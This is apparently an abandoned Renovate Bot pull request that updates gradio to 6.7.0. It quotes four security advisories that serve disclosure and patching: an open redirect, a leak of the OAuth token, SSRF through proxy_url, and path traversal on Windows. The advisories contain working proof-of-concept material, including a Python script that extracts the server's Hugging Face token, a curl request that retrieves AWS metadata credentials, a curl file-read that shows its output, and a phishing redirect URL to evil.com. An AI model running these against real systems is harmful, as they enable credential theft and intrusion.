chore(deps): update dependency gradio to v6.7.0 [security] - abandoned

[test-renovate-bot-12345]

This PR contains the following updates:

Package	Change	Age	Confidence
gradio	6.4.0 → 6.7.0

---

Gradio has an Open Redirect in its OAuth Flow

CVE-2026-28415 / GHSA-pfjf-5gxr-995x

More information

Details

Summary

The _redirect_to_target() function in Gradio's OAuth flow accepts an unvalidated _target_url query parameter, allowing redirection to arbitrary external URLs. This affects the /logout and /login/callback endpoints on Gradio apps with OAuth enabled (i.e. apps running on Hugging Face Spaces with gr.LoginButton).

Details

  def _redirect_to_target(request, default_target="/"):
      target = request.query_params.get("_target_url", default_target)
      return RedirectResponse(target)  # No validation

An attacker can craft a URL like https://my-space.hf.space/logout?_target_url=https://evil.com/phishing that redirects the user to an external site after logout. Because the URL originates from a trusted hf.space domain, users are more likely to trust the link.

Impact

Phishing — an attacker can use the trusted domain to redirect users to a malicious site. No direct data exposure or server-side impact.

Fix

The _target_url parameter is now sanitized to only use the path, query, and fragment, stripping any scheme or host.

Severity

• CVSS Score: 4.3 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

References

• https://github.com/gradio-app/gradio/security/advisories/GHSA-pfjf-5gxr-995x
• https://nvd.nist.gov/vuln/detail/CVE-2026-28415
• https://github.com/gradio-app/gradio/commit/dfee0da06d0aa94b3c2684131e7898d5d5c1911e
• https://github.com/gradio-app/gradio
• https://github.com/gradio-app/gradio/releases/tag/gradio%406.6.0

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Gradio: Mocked OAuth Login Exposes Server Credentials and Uses Hardcoded Session Secret

CVE-2026-27167 / GHSA-h3h8-3v2v-rg7m

More information

Details

Summary

Gradio applications running outside of Hugging Face Spaces automatically enable "mocked" OAuth routes when OAuth components (e.g. gr.LoginButton) are used. When a user visits /login/huggingface, the server retrieves its own Hugging Face access token via huggingface_hub.get_token() and stores it in the visitor's session cookie. If the application is network-accessible, any remote attacker can trigger this flow to steal the server owner's HF token. The session cookie is signed with a hardcoded secret derived from the string "-v4", making the payload trivially decodable.

Affected Component

gradio/oauth.py — functions attach_oauth(), _add_mocked_oauth_routes(), and _get_mocked_oauth_info().

Root Cause Analysis

1. Real token injected into every visitor's session

When Gradio detects it is not running inside a Hugging Face Space (get_space() is None), it registers mocked OAuth routes via _add_mocked_oauth_routes() (line 44).

The function _get_mocked_oauth_info() (line 307) calls huggingface_hub.get_token() to retrieve the real HF access token configured on the host machine (via HF_TOKEN environment variable or huggingface-cli login). This token is stored in a dict that is then injected into the session of any visitor who hits /login/callback (line 183):

request.session["oauth_info"] = mocked_oauth_info

The mocked_oauth_info dict contains the real token at key access_token (line 329):

return {
    "access_token": token,  # <-- real HF token from server
    ...
}

2. Hardcoded session signing secret

The SessionMiddleware secret is derived from OAUTH_CLIENT_SECRET (line 50):

session_secret = (OAUTH_CLIENT_SECRET or "") + "-v4"

When running outside a Space, OAUTH_CLIENT_SECRET is not set, so the secret becomes the constant string "-v4", hashed with SHA-256. Since this value is public (hardcoded in source code), any attacker can decode the session cookie payload without needing to break the signature.

In practice, Starlette's SessionMiddleware stores the session data as plaintext base64 in the cookie — the signature only provides integrity, not confidentiality. The token is readable by simply base64-decoding the cookie payload.

Attack Scenario

Prerequisites

• A Gradio app using OAuth components (gr.LoginButton, gr.OAuthProfile, etc.)
• The app is network-accessible (e.g. server_name="0.0.0.0", share=True, port forwarding, etc.)
• The host machine has a Hugging Face token configured
• OAUTH_CLIENT_SECRET is not set (default outside of Spaces)

Steps

1. Attacker sends a GET request to http://<target>:7860/login/huggingface
2. The server responds with a 307 redirect to /login/callback
3. The attacker follows the redirect; the server sets a session cookie containing the real HF token
4. The attacker base64-decodes the cookie payload (everything before the first .) to extract the access_token

Minimal Vulnerable Application

import gradio as gr
from huggingface_hub import login

login(token="hf_xxx...")

def hello(profile: gr.OAuthProfile | None) -> str:
    if profile is None:
        return "Not logged in."
    return f"Hello {profile.name}"

with gr.Blocks() as demo:
    gr.LoginButton()
    gr.Markdown().attach_load_event(hello, None)

demo.launch(server_name="0.0.0.0")

Proof of Concept

#!/usr/bin/env python3
"""
POC: Gradio mocked OAuth leaks server's HF token via session + weak secret
Usage: python exploit.py --target http://victim:7860
       python exploit.py --target http://victim:7860 --proxy http://127.0.0.1:8080
"""
import argparse
import base64
import json
import sys
import requests

def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:7860")
    ap.add_argument("--proxy", default=None, help="HTTP proxy, e.g. http://127.0.0.1:8080")
    args = ap.parse_args()

    base = args.target.rstrip("/")
    proxies = {"http": args.proxy, "https": args.proxy} if args.proxy else None

    # 1. Trigger mocked OAuth flow — server injects its own HF token into our session
    s = requests.Session()
    s.get(f"{base}/login/huggingface", allow_redirects=True, verify=False, proxies=proxies)

    cookie = s.cookies.get("session")
    if not cookie:
        print("[-] No session cookie received; target may not be vulnerable.", file=sys.stderr)
        sys.exit(1)

    # 2. Decode the cookie payload (base64 before the first ".")
    payload_b64 = cookie.split(".")[0]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # fix padding
    data = json.loads(base64.b64decode(payload_b64))
    token = data.get("oauth_info", {}).get("access_token")

    if token:
        print(f"[+] Leaked HF token: {token}")
    else:
        print("[-] No access_token found in session.", file=sys.stderr)
        sys.exit(1)

if __name__ == "__main__":
    main()

Severity

• CVSS Score: 0.0 / 10 (None)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:N

References

• https://github.com/gradio-app/gradio/security/advisories/GHSA-h3h8-3v2v-rg7m
• https://nvd.nist.gov/vuln/detail/CVE-2026-27167
• https://github.com/gradio-app/gradio/commit/dfee0da06d0aa94b3c2684131e7898d5d5c1911e
• https://github.com/gradio-app/gradio
• https://github.com/gradio-app/gradio/releases/tag/gradio@6.6.0

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Gradio has SSRF via Malicious proxy_url Injection in gr.load() Config Processing

CVE-2026-28416 / GHSA-jmh7-g254-2cq9

More information

Details

Summary

A Server-Side Request Forgery (SSRF) vulnerability in Gradio allows an attacker to make arbitrary HTTP requests from a victim's server by hosting a malicious Gradio Space. When a victim application uses gr.load() to load an attacker-controlled Space, the malicious proxy_url from the config is trusted and added to the allowlist, enabling the attacker to access internal services, cloud metadata endpoints, and private networks through the victim's infrastructure.

Details

The vulnerability exists in Gradio's config processing flow when loading external Spaces:

1. Config Fetching (gradio/external.py:630): gr.load() calls Blocks.from_config() which fetches and processes the remote Space's configuration.

2. Proxy URL Trust (gradio/blocks.py:1231-1233): The proxy_url from the untrusted config is added directly to self.proxy_urls:

   if config.get("proxy_url"):
       self.proxy_urls.add(config["proxy_url"])

3. Built-in Proxy Route (gradio/routes.py:1029-1031): Every Gradio app automatically exposes a /proxy={url_path} endpoint:

   @​router.get("/proxy={url_path:path}", dependencies=[Depends(login_check)])
   async def reverse_proxy(url_path: str):

4. Host-based Validation (gradio/routes.py:365-368): The validation only checks if the URL's host matches any trusted proxy_url host:

   is_safe_url = any(
       url.host == httpx.URL(root).host for root in self.blocks.proxy_urls
   )

An attacker can set proxy_url to http://169.254.169.254/ (AWS metadata) or any internal service, and the victim's server will proxy requests to those endpoints.

PoC

Full PoC: https://gist.github.com/logicx24/8d4c1aaa4e70f85d0d0fba06a463f2d6

1. Attacker creates a malicious Gradio Space that returns this config:

{
    "mode": "blocks",
    "components": [...],
    "proxy_url": "http://169.254.169.254/"  # AWS metadata endpoint
}

2. Victim loads the malicious Space:

import gradio as gr
demo = gr.load("attacker/malicious-space")
demo.launch(server_name="0.0.0.0", server_port=7860)

3. Attacker exploits the proxy:

##### Fetch AWS credentials through victim's server
curl "http://victim:7860/gradio_api/proxy=http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name"

Impact

Who is impacted:

• Any Gradio application that uses gr.load() to load external/untrusted Spaces
• HuggingFace Spaces that compose or embed other Spaces
• Enterprise deployments where Gradio apps have access to internal networks

Attack scenarios:

• Cloud credential theft: Access AWS/GCP/Azure metadata endpoints to steal IAM credentials
• Internal service access: Reach databases, admin panels, and APIs on private networks
• Network reconnaissance: Map internal infrastructure through the victim
• Data exfiltration: Access sensitive internal APIs and services

Severity

• CVSS Score: 8.2 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

References

• https://github.com/gradio-app/gradio/security/advisories/GHSA-jmh7-g254-2cq9
• https://nvd.nist.gov/vuln/detail/CVE-2026-28416
• https://github.com/gradio-app/gradio/commit/fc7c01ea1e581ef70be98fddf003b0c91315c7cc
• https://github.com/gradio-app/gradio
• https://github.com/gradio-app/gradio/releases/tag/gradio%406.6.0

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Gradio is Vulnerable to Absolute Path Traversal on Windows with Python 3.13+

CVE-2026-28414 / GHSA-39mp-8hj3-5c49

More information

Details

Summary

Gradio apps running on Window with Python 3.13+ are vulnerable to an absolute path traversal issue that enables unauthenticated attackers to read arbitrary files from the file system.

Details

Python 3.13+ changed the definition of os.path.isabs so that root-relative paths like /windows/win.ini on Windows are no longer considered absolute paths, resulting in a vulnerability in Gradio's logic for joining paths safely.

This can be exploited by unauthenticated attackers to read arbitrary files from the Gradio server, even when Gradio is set up with authentication.

PoC

% curl http://10.10.10.10:7860/static//windows/win.ini
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Impact

Arbitrary file read in the context of the Windows user running Gradio.

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

References

• https://github.com/gradio-app/gradio/security/advisories/GHSA-39mp-8hj3-5c49
• https://nvd.nist.gov/vuln/detail/CVE-2026-28414
• https://github.com/gradio-app/gradio/commit/6011b00d0154b85532fa901dd73cf8fa7d86fd04
• https://github.com/gradio-app/gradio

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

gradio-app/gradio (gradio)

v6.7.0

Compare Source

Features

• #​12829 d720b25 - Allow :fastest :cheapest options when loading models. Thanks @​dawoodkhan82!
• #​12918 e29e1cc - Add Space-specific skill generation to gradio skills add. Thanks @​abidlabs!
• #​12929 978bc6e - Add server functions support to gr.HTML. Thanks @​aliabid94!
• #​12917 a0fff5c - Add push_to_hub method to gr.HTML. Add a gallery to view notable custom HTML components. Thanks @​freddyaboulton!
• #​12899 820eff0 - Add support for gr.HTML as a layout element. Thanks @​aliabid94!
• #​12900 d6907ac - add SKILLS.md to Gradio repo, part 1 + cleanup. Thanks @​abidlabs!
• #​12907 3e625a0 - Better error handling when connection to server is lost. Thanks @​abidlabs!

Fixes

• #​12911 dcfc429 - Fix Button component ignoring the scale parameter. Thanks @​hztBUAA!
• #​12925 ccff8b8 - Walkthrough Selected Bug. Thanks @​freddyaboulton!
• #​12890 ac29df8 - fix DataFrame NaN values becoming 0 after sorting. Thanks @​Mr-Neutr0n!
• #​12926 6011b00 - Fix absolute path issue in Windows. Thanks @​freddyaboulton!
• #​12904 7c3fa2a - Fix Loading Spinner Issue Caused by Events Targeting Components In Inactive Tabs. Thanks @​freddyaboulton!
• #​12903 57707c7 - Fix Tab i18n issue. Thanks @​freddyaboulton!
• #​12901 1387fc6 - Fix unload event bug. Thanks @​freddyaboulton!
• #​12906 81482b5 - Lazy load sub-tab and accordion components. Thanks @​dawoodkhan82!

v6.6.0

Compare Source

Features

• #​12839 1c671b3 - Hide forms with no elements. Thanks @​aliabid94!
• #​12700 b01c95a - Rewrite behavior section of docs. Thanks @​aliabd!

Fixes

• #​12875 d0b3422 - Fix stop button not switching back to submit button in chat interface. Thanks @​freddyaboulton!
• #​12797 6a0c6ea - Refactor translation logic. Thanks @​hannahblair!
• #​12877 ebbd242 - Ensure disconnected toast text is visible. Thanks @​hannahblair!
• #​12873 6533d38 - Fix stop button not working in Audio streaming. Thanks @​hysts!
• #​12862 a8e6b7b - Fix ColorPicker not firing focus, blur, or submit events after Svelte 5 migration. Thanks @​veeceey!
• #​12865 db7ab39 - Fix Gallery fullscreen button not working in preview mode. Thanks @​veeceey!
• #​12866 9810396 - Fix Gallery preview=True parameter not working on initial load. Thanks @​veeceey!
• #​12894 e0cd4ca - Fix load examples bug in spa. Thanks @​freddyaboulton!
• #​12830 a2a0078 - Video to Svelte 5. Thanks @​dawoodkhan82!
• #​12882 fc7c01e - Validate proxy url host. Thanks @​freddyaboulton!
• #​12874 b10e17c - fix(reloading): Re-assign config for SpacesReloader. Thanks @​cbensimon!
• #​12884 dfee0da - Oauth fixes. Thanks @​freddyaboulton!
• #​12811 8f8cef8 - Fix windows tests. Thanks @​freddyaboulton!
• #​12846 226daba - Fix bug where children of accordions dont get rendered when they are opened programmatically. Thanks @​freddyaboulton!
• #​12887 c006778 - Fix AttributeError in ColoredCheckboxGroup.api_info(). Thanks @​hysts!

v6.5.1

Compare Source

Fixes

• #​12840 26cea7a - Ensure change event fires when slider value changes to 0. Thanks @​hannahblair!
• #​12845 0eac164 - [Hotfix] add pytz to requirements. Thanks @​RektPunk!

v6.5.0

Compare Source

Features

• #​12804 fc366b4 - Allow webcam uploads and clipboard paste for gallery. Thanks @​freddyaboulton!
• #​12834 ddbb6a9 - Allow pandas version 3. Thanks @​freddyaboulton!

Fixes

• #​12818 6594c9c - Migrate Dataset to Svelte 5. Thanks @​freddyaboulton!
• #​12828 151cbd1 - Fix private spaces. Thanks @​freddyaboulton!
• #​12835 5ecf6d2 - Fix CSS root in spaces. Thanks @​freddyaboulton!
• #​12813 99caae6 - Migrate StatusTracker to Svelte 5. Thanks @​freddyaboulton!
• #​12810 7ed6dfa - Migrate js/fileexplorer to svelte5. Thanks @​aliabid94!
• #​12789 af5e86f - Migrate gr.MultimodalTextbox. Thanks @​hannahblair!
• #​12809 8409b7a - Migrate js/code. Thanks @​aliabid94!
• #​12817 05acc66 - Fix Login. Thanks @​freddyaboulton!

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Renovate Bot.

[test-renovate-bot-12345]

Autoclosing Skipped

This PR has been flagged for autoclosing. However, it is being skipped due to the branch being already modified. Please close/delete it manually or report a bug if you think this is in error.